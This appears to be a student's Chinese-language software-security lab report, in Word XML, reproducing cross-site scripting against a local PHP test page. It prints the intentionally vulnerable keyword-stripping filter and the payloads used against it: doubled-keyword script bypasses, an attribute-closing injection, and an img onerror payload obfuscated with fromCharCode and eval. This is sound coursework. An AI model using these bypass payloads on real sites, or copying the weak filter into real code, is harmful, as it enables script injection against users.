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《软件安全》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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姓名：禹相祐      学号：2312900      班级：计算机科学与技术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实验名称：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="42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跨站脚本攻击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实验要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind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复现课本第十一章实验三,通过img和script两类方式实现跨站脚本攻击,撰写实验报告。有能力者,可以自己撰写更安全的过滤程序。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实验过程：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Script方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="3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建立源文件，输入源代码如下：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&lt;!DOCTYPE html&gt;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head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http-equiv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"content-type"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content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"text/html;charset=utf-8"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 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script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window.alert = function()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{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confirm("Congratulations~");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script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head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body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align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center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&gt;--Welcome To The Simple XSS Test--&lt;/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h1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&lt;?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ini_set("display_errors", 0);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strtolower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 $_GET["keyword"]);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str2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str_replace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("script","",$str);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str3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str_replace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("on","",$str2);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str4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str_replace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("src","",$str3);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echo "&lt;h2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align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center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&gt;Hello ".htmlspecialchars($str).".&lt;/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h2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&gt;".'&lt;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center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action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xss_test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.php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method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GET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type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submit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submit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value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Submit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/&gt;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keyword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 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value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"'.$str4.'"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form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center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&gt;';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?&gt;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body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html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widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="300" w:firstLine="418" w:firstLineChars="0"/>
        <w:jc w:val="both"/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运行后我们打开网页输入网址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1/xss_test.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none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发现页面如下图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="300" w:firstLine="418" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default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highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4895850" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="屏幕截图 2025-05-24 153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5-24 1536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300" w:firstLine="418" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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然后我们输入：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&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘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xss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’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)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,效果如下图：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040" cy="1372235"/>
            <wp:effectExtent l="0" t="0" r="1016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然后我们再次输入：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&lt;scrscriptipt&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>alert('xss')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&lt;scscriptript&gt;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,效果如下图：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5269230" cy="1273810"/>
            <wp:effectExtent l="0" t="0" r="1270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然后查看代码可以知道，我们需要将最前面的input闭合掉才能实现我们想要的效果，所以再次输入：”&gt;&lt;scrscriptipt&gt;alert(‘xss’)&lt;/scscriptript&gt;&lt;!--,并且将magic_quotes_gpc由On修改为Off，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="84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2354580"/>
            <wp:effectExtent l="0" t="0" r="1206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Img方式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我们将原先代码进行修改，如下：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2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63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&lt;!DOCTYPE html&gt;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head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meta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http-equiv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"content-type"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content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"text/html;charset=utf-8"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script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window.alert = function()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confirm("Congratulations~");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script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head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body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h1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align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center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&gt;--Welcome To The Simple XSS Test--&lt;/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h1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&lt;?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php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ini_set( "display_errors", 0);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strtolower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($_GET["keyword"]);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str2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str_replace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("script", "", $str);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str3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str_replace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("on", "", $str2);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$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str4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str_replace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("src", "", $str3);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echo "&lt;h2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align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center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&gt;Hello ".htmlspecialchars($str).".&lt;/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h2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center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form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action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xss_test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.php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method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GET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type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submit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submit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value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Submit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name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keyword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value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'".htmlspecialchars($str4)."'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form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center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&gt;";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?&gt;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img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src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"ops!"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 xml:space="preserve">onerror="var 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80808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payload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=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FF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String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.fromCharCode(99,111,110,102,105,114,109,40,39,88,83,83,39,41);eval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(payload)"&gt;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body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16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pP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333333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&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="5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6699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html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="5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0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16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&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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我们对上述代码进行简单分析：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创建会报错的img,故意使用错误的地址，方便触发onerror事件；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="both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用ASCII码拼出攻击的指令，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A626A4"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>let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  <w:t xml:space="preserve"> payload </w:t>
      </w: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sz w:val="28"/>
          <w:szCs w:val="28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  <w:t xml:space="preserve"> String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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>fromCharCode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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(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aps w:val="0"/>
          <w:color w:val="B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>97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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>108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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>101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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>114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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>116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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>40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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>39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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>88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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>83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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>83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8"/>
          <w:szCs w:val="2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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>39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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,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B76B01"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>41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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；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420" w:leftChars="0" w:right="0" w:righ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28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用eval函数直接执行，绕过检测，实现攻击。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494949"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="both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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;img src=ops! onerror=”alert(‘XSS’)”&gt;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运行结果如下：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867275" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635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心得体会：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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这次我学习了两个比较简单的跨站脚本攻击的方式，分别是Script方式，另一个是img方式。二者都能利用基础的特性实现攻击，但原理相差的比较大。通过这次实验，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我也学习到了script过滤关键字的实现方式，也算是收获满满了。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92A67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90392A6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4623D72"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="04623D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mYzAzNjkxODczYWVlMzk0MWY5MzFjYjRmODcyOTIifQ=="/>
    <w:docVar w:name="KSO_WPS_MARK_KEY" w:val="01718c61-1b20-4dd4-ad29-c5d18faf8ca0"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="7C8B12AF"/>
    <w:rsid w:val="171209D4"/>
    <w:rsid w:val="507D16BC"/>
    <w:rsid w:val="5A0A4E7F"/>
    <w:rsid w:val="7C8B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591</Words>
  <Characters>2100</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2261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2025-04-12T02:35:00Z</dcterms:created>
  <dc:creator>。</dc:creator>
  <cp:lastModifiedBy>。</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-24T08:02:38Z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4C1B95033D4E46E9A325229A097FC410</vt:lpwstr>
  </property>
</Properties>
</file>